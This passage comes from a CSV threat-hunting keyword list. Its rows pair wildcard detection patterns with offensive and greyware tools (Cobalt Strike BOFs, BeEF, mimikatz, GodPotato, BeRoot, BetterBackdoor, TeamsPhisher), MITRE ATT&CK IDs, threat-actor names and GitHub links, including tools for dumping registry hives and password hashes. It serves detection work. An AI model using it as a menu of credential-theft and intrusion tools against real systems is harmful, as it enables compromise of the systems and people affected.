T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*BeaconPrintf*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconPrintToStreamW*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*BeaconSpawnTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*BeaconSpawnTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconTool -*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*BeaconTool/lib/sleep.jar*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*BeaconUseToken*,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*beef:beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind_tcp-stage.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind_tcp-stager.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stage*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stage.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stager.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_test.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beefproject*,offensive_tool_keyword,beef,The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1210 - T1216 - T1207 - T1189 - T1190 - T1566,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef-xss*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Beelogger*,offensive_tool_keyword,BeeLogger,Keylogger generator. fake office and acrobat file and malicious executables generator,T1056 - T1105 - T1204 - T1106,TA0003 - TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/4w4k3/BeeLogger,1,1,N/A,N/A,10,902,343,2022-12-02T19:42:41Z,2017-02-17T15:34:39Z -*BeetleChunks/SpoolSploit*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*before-create-implant-callback*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*before-create-implant-io-bin*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - 
T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*before-find-implant-chunks*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*BeichenDream/GodPotato*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*BeichenDream/SharpToken*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*benjamin@gentilkiwi.com*,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*BeRoot*,offensive_tool_keyword,BeRoot,BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.,T1068 - T1548 - T1574,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beRoot.exe*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beroot.py -*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beRoot.zip*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - 
T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*BeRoot-master*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*berzerk0*,offensive_tool_keyword,Github Username,github username known for repos on passwords exploitation and offensive tools,N/A,N/A,N/A,N/A,Credential Access,https://github.com/berzerk0,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BesoToken.exe list*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*BesoToken-master*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*best*phish her*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,0,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*bestcrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bestcryptve2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*BetterBackdoor*,offensive_tool_keyword,BetterBackdoor,A backdoor is a tool used to gain remote access to a machine.,T1071 - T1055 - T1059 - T1053,TA0002 - TA0006 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/thatcherclough/BetterBackdoor,1,1,N/A,N/A,3,275,89,2022-10-03T21:30:21Z,2019-07-29T14:45:24Z -*bettercap *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*bettercap -iface eth0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bettercap.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z 
-*bettercap_.deb*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*bettercap-master.zip*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*betterdefaultpasslist*,offensive_tool_keyword,betterdefaultpasslist,list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing,T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119,TA0006 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/govolution/betterdefaultpasslist,1,1,N/A,N/A,6,585,151,2021-03-11T11:32:17Z,2016-09-24T16:21:44Z -*BetterSafetyKatz.*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*bfidboloedlamgdmenmlbipfnccokknp*,greyware_tool_keyword,PureVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bgetprivs*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bhashdump*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bhd_enum_dconly*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bhnhkdgoefpmekcgnccpnhjfdgicfebm*,greyware_tool_keyword,Wachee VPN,External VPN usage within coporate network,T1090.003 - 
